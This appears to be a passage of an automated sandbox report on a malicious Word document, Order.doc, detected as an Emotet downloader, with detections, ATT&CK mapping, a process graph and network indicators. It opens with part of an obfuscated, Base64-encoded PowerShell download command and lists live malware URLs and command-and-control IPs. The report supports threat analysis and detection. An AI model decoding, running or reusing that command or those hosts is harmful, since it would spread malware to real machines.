AJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AG
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 00000008.00000002.2094913747.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2092409320.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2098118909.0000000000320000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2098009043.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2092516972.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2097063566.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2336211532.0000000000260000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2097445507.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2101634327.0000000000720000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2092704885.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2096952501.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2336195679.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2101426694.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2098032897.0000000000280000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2095103110.0000000000870000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2101331684.0000000000370000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2094951149.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2336233664.00000000002D0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 10.2.rundll32.exe.320000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.280000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.260000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.720000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.2f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.3a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.320000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.720000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.870000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.3a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.2f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.260000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.2d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.280000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.870000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection111Masquerading21OS Credential DumpingSecurity Software Discovery11Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsCommand and Scripting Interpreter211Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsScripting12Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Process Injection111NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol15SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsPowerShell3Network Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information3LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonScripting12Cached Domain CredentialsSystem Information Discovery15VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsHidden Files and Directories1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobObfuscated Files or Information1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 344065 Sample: Order.doc Startdate: 25/01/2021 Architecture: WINDOWS Score: 100 54 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->54 56 Antivirus detection for URL or domain 2->56 58 Multi AV Scanner detection for dropped file 2->58 60 13 other signatures 2->60 13 cmd.exe 2->13         started        16 WINWORD.EXE 293 24 2->16         started        process3 file4 68 Suspicious powershell command line found 13->68 70 Very long command line found 13->70 72 Encrypted powershell cmdline option found 13->72 19 powershell.exe 16 9 13->19         started        24 msg.exe 13->24         started        44 C:\Users\user\Desktop\~$Order.doc, data 16->44 dropped signatures5 process6 dnsIp7 48 nightlifemumbai.club 172.217.6.174, 49165, 80 GOOGLEUS United States 19->48 50 shop.nowfal.dev 104.21.88.166, 443, 49166 CLOUDFLARENETUS United States 19->50 46 C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll, PE32 19->46 dropped 64 Powershell drops PE file 19->64 26 rundll32.exe 19->26         started        file8 signatures9 process10 process11 28 rundll32.exe 26->28         started        process12 30 rundll32.exe 2 28->30         started        signatures13 74 Hides that the sample has been downloaded from the Internet (zone.identifier) 30->74 33 rundll32.exe 30->33         started        process14 process15 35 rundll32.exe 1 33->35         started        signatures16 62 Hides that the sample has been downloaded from the Internet (zone.identifier) 35->62 38 rundll32.exe 35->38         started        process17 process18 40 rundll32.exe 9 38->40         started        dnsIp19 52 190.55.186.229, 49167, 80 TelecentroSAAR Argentina 40->52 66 System process connects to network (likely due to code injection or exploit) 40->66 signatures20

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Order.doc33%VirustotalBrowse
                      Order.doc9%ReversingLabs

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll100%Joe Sandbox ML
                      C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll39%ReversingLabsWin32.Trojan.EmotetCrypt

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      7.2.rundll32.exe.400000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      10.2.rundll32.exe.280000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      11.2.rundll32.exe.720000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      8.2.rundll32.exe.870000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      9.2.rundll32.exe.400000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      12.2.rundll32.exe.2d0000.1.unpack100%AviraHEUR/AGEN.1110387Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      shop.nowfal.dev5%VirustotalBrowse
                      nightlifemumbai.club2%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      https://jflmktg.wpcomstaging.com/wp-content/AK/0%VirustotalBrowse
                      https://jflmktg.wpcomstaging.com/wp-content/AK/100%Avira URL Cloudmalware
                      http://nightlifemumbai.club/x/0wBD3/5%VirustotalBrowse
                      http://nightlifemumbai.club/x/0wBD3/100%Avira URL Cloudmalware
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://190.55.186.229/efl8dd1i/0%Avira URL Cloudsafe
                      https://shop.nowfal.dev100%Avira URL Cloudmalware
                      http://nightlifemumbai.club0%Avira URL Cloudsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://e-wdesign.eu/wp-content/bn1IgDejh/0%Avira URL Cloudsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://traumfrauen-ukraine.de/bin/JyeS/0%Avira URL Cloudsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/0%Avira URL Cloudsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      https://shop.nowfal.dev/wp-includes/RlMObf2j0/100%Avira URL Cloudmalware

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      shop.nowfal.dev
                      104.21.88.166
                      truetrueunknown
                      nightlifemumbai.club
                      172.217.6.174
                      truetrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://nightlifemumbai.club/x/0wBD3/true
                      • 5%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      unknown
                      http://190.55.186.229/efl8dd1i/true
                      • Avira URL Cloud: safe
                      unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.windows.com/pctv.rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmpfalse
                        high
                        http://investor.msn.compowershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094919948.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093582036.0000000001FC0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095246701.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmpfalse
                          high
                          http://www.msnbc.com/news/ticker.txtpowershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094919948.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093582036.0000000001FC0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095246701.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmpfalse
                            high
                            https://jflmktg.wpcomstaging.com/wp-content/AK/powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmptrue
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: malware
                            unknown
                            http://crl.entrust.net/server1.crl0powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmpfalse
                              high
                              http://ocsp.entrust.net03powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              https://shop.nowfal.devpowershell.exe, 00000005.00000002.2095244145.0000000003AC4000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://nightlifemumbai.clubpowershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://e-wdesign.eu/wp-content/bn1IgDejh/powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              http://windowsmedia.com/redir/services.asp?WMPFriendly=truepowershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2095171986.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093779954.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095562122.00000000020E7000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.hotmail.com/oepowershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094919948.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093582036.0000000001FC0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095246701.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmpfalse
                                high
                                http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkpowershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2095171986.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093779954.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095562122.00000000020E7000.00000002.00000001.sdmpfalse
                                  high
                                  http://traumfrauen-ukraine.de/bin/JyeS/powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.icra.org/vocabulary/.powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2095171986.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093779954.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095562122.00000000020E7000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000005.00000002.2090481396.00000000024B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2098401477.0000000002A70000.00000002.00000001.sdmpfalse
                                    high
                                    https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://investor.msn.com/powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094919948.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093582036.0000000001FC0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095246701.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.%s.comPApowershell.exe, 00000005.00000002.2090481396.00000000024B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2098401477.0000000002A70000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      low
                                      http://ocsp.entrust.net0Dpowershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      https://secure.comodo.com/CPS0powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmpfalse
                                        high
                                        http://crl.entrust.net/2048ca.crl0powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmpfalse
                                          high
                                          https://shop.nowfal.dev/wp-includes/RlMObf2j0/powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmptrue
                                          • Avira URL Cloud: malware
                                          unknown

                                          Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public

                                          IPDomainCountryFlagASNASN NameMalicious
                                          104.21.88.166
                                          unknownUnited States
                                          13335CLOUDFLARENETUStrue
                                          172.217.6.174
                                          unknownUnited States
                                          15169GOOGLEUStrue
                                          190.55.186.229
                                          unknownArgentina
                                          27747TelecentroSAARtrue

                                          General Information

                                          Joe Sandbox Version:31.0.0 Emerald
                                          Analysis ID:344065
                                          Start date:25.01.2021
                                          Start time:23:13:00
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 8m 48s
                                          Hypervisor based Inspection enabled:false
                                          Report type:light
                                          Sample file name:Order.doc
                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                          Number of analysed new started processes analysed:14
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • GSI enabled (VBA)
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winDOC@20/8@2/3
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 8.4% (good quality ratio 8%)
                                          • Quality average: 72.1%
                                          • Quality standard deviation: 25.3%
                                          HCA Information:Failed
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .doc
                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                          • Found warning dialog
                                          • Click Ok
                                          • Attach to Office via COM
                                          • Scroll down
                                          • Close Viewer
                                          Warnings:
                                          Show All
                                          • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                          • TCP Packets have been reduced to 100
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          23:13:36API Interceptor1x Sleep call for process: msg.exe modified
                                          23:13:37API Interceptor48x Sleep call for process: powershell.exe modified
                                          23:13:43API Interceptor875x Sleep call for process: rundll32.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          104.21.88.166N00048481397007.docGet hashmaliciousBrowse
                                            172.217.6.174N00048481397007.docGet hashmaliciousBrowse
                                            • nightlifemumbai.club/x/0wBD3/
                                            Scan_Image_From_QUINNEY_&_ASSOCIATES.pdfGet hashmaliciousBrowse
                                            • crl.pki.goog/GTSGIAG3.crl
                                            d5#U309a.docGet hashmaliciousBrowse
                                            • clients1.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih%2BZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCEbXmsCz9vTc
                                            190.55.186.229N00048481397007.docGet hashmaliciousBrowse
                                            • 190.55.186.229/pvaadnb3/
                                            Invoice 6682363.docGet hashmaliciousBrowse
                                            • 190.55.186.229/zu0s8fp/p0ci9j50w974/cj5r0kfb71n/m8g30yu0kjfggim2u/66n2ab/ipuz3m08m8x037v8/
                                            certificado.docGet hashmaliciousBrowse
                                            • 190.55.186.229/t3u070voc/dhvfsiwa8/4hr1scfgu20pt/iroc8/mlfa/v0pznqop/
                                            SecuriteInfo.com.Mal.DocDl-K.24054.docGet hashmaliciousBrowse
                                            • 190.55.186.229/i9lbsrtqcu0eub47zf/
                                            SecuriteInfo.com.Mal.DocDl-K.32352.docGet hashmaliciousBrowse
                                            • 190.55.186.229/jgeu/
                                            SecuriteInfo.com.Mal.DocDl-K.460.docGet hashmaliciousBrowse
                                            • 190.55.186.229/mlqum5rvy23mclyw98/bxc1sxq6pyd4l/glso7yy9y6j/63ww5/j94pvx/
                                            PQWX99943.docGet hashmaliciousBrowse
                                            • 190.55.186.229/b0sm4wo0eycy/enwxs3/ch9vx64v/

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            shop.nowfal.devN00048481397007.docGet hashmaliciousBrowse
                                            • 104.21.88.166
                                            nightlifemumbai.clubN00048481397007.docGet hashmaliciousBrowse
                                            • 172.217.6.174

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            TelecentroSAARN00048481397007.docGet hashmaliciousBrowse
                                            • 190.55.186.229
                                            Invoice 6682363.docGet hashmaliciousBrowse
                                            • 190.55.186.229
                                            certificado.docGet hashmaliciousBrowse
                                            • 190.55.186.229
                                            SecuriteInfo.com.Mal.DocDl-K.24054.docGet hashmaliciousBrowse
                                            • 190.55.186.229
                                            SecuriteInfo.com.Mal.DocDl-K.32352.docGet hashmaliciousBrowse
                                            • 190.55.186.229
                                            SecuriteInfo.com.Mal.DocDl-K.460.docGet hashmaliciousBrowse
                                            • 190.55.186.229
                                            PQWX99943.docGet hashmaliciousBrowse
                                            • 190.55.186.229
                                            dq1J3cjv.exeGet hashmaliciousBrowse
                                            • 186.19.62.249
                                            malware1.exeGet hashmaliciousBrowse
                                            • 186.19.26.230
                                            Astra.x86Get hashmaliciousBrowse
                                            • 181.45.174.122
                                            ezkQ0RtL.exeGet hashmaliciousBrowse
                                            • 186.19.62.249
                                            14240456646.exeGet hashmaliciousBrowse
                                            • 186.19.62.249
                                            GsQzmGULNs.exeGet hashmaliciousBrowse
                                            • 186.23.189.192
                                            43mai.exeGet hashmaliciousBrowse
                                            • 186.19.205.93
                                            27Label_00384463.doc.jsGet hashmaliciousBrowse
                                            • 181.44.194.254
